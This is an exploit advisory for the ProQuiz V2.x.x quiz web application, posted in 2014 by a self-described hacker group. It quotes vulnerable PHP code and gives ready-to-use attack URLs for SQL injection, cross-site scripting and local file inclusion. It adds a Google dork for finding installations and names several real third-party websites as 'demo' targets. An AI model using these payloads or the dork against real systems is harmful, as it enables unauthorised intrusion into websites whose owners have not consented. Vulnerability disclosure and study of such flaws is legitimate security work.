ProQuiz V2.x.x Multiple Vulnerabilities
2014-02-18 11:38:08Inviato da: JoKeR_StEx
##########################################################################
# Exploit Title : ProQuiz V2.x.x => Multiple Vulnerabilities
# Google Dork : [if relevant] (we will automatically add these to the GHDB)
# Date : 15/02/2014
# Exploit Author : JoKeR_StEx
# Vendor Homepage : http://proquiz.softon.org/
# Version : V2.x.x
# Tested on : Windows
# CVE : [~]
###########################################################################
[+] Description :
ProQuize V2.x.x affected by SQL injection and Cross Site Scripting & LFI
The vulnerabilities in parametere username & email in file functions about register
[-] Vulnerable Code :
# Line 610=>634
if(!empty($_GET['username'])){
if($_GET['username']==$_SESSION['UA_DETAILS']['username']){
echo "true";
}else{
if(checkUsernameExists($db,$_GET['username'])){
echo "false";
}else{
echo "true";
}
}
}
if(!empty($_GET['email'])){
if($_GET['email']==$_SESSION['UA_DETAILS']['email']){
echo "true";
}else{
if(checkEmailExists($db,$_GET['email'])){
echo "false";
}else{
echo "true";
}
}
}
The Vulnerability in para username : the coder use function CheckUsernameExists() for get username
for confirm if already exists use var $db from class database in file Database.class.php and para2 $_GET['username']
for get info for confirm
The Same Things With email;
[+] Exploit
Dork: "Powered by Softon Technologies"
1-Sql injection
http://127.0.0.1/ProQuiz V2.0.1/functions.php?username=[SQli]
http://127.0.0.1/ProQuiz V2.0.1/functions.php?email=[SQli]
2-Cross Site scripting
http://127.0.0.1/ProQuiz V2.0.1/functions.php?username="><script>alert('Xss');</script>
http://127.0.0.1/ProQuiz V2.0.1/functions.php?email="><script>alert('Xss');</script>
3-LFI
About LFI IN THE file admin.php
code :
if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php');
}else{
echo getContents($db,'admin_panel');
}
http://127.0.0.1/ProQuiz V2.0.1/admin.php?action=getpage&page=[file]
when you include file don't create the type of the file just put the name of the file
because you can only include php file
[+] Demo :
http://webexamiq.com/functions.php?username=[SQLI]or[XSS]
http://webexamiq.com/functions.php?email=[SQLI]or[XSS]
http://energia.com.br/web/quiz/functions.php?username=[SQLI]or[XSS]
http://energia.com.br/web/quiz/functions.php?email=[SQLI]or[XSS]
http://effchurch.org/pquiz/functions.php?username=[SQLI]or[XSS]
You Can Find More Websites Infected In Google ^____^'
^___-' Enjoy ^____^
###################
http://www.th3xploiterz.com/
The Black Devils
Dz Crazy L33ts
###################
###########################Gr33tings################################################################
Gr33t'z to : Assesino04, Shield Dz, Eve Dized , Dr.0ryx & My Familly & All Algerians and My Friends
####################################################################################################
Email : [email protected]
Facebook : fb.me/imadlilong.lasvegas
Twitter : @JoKeR_StEx
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.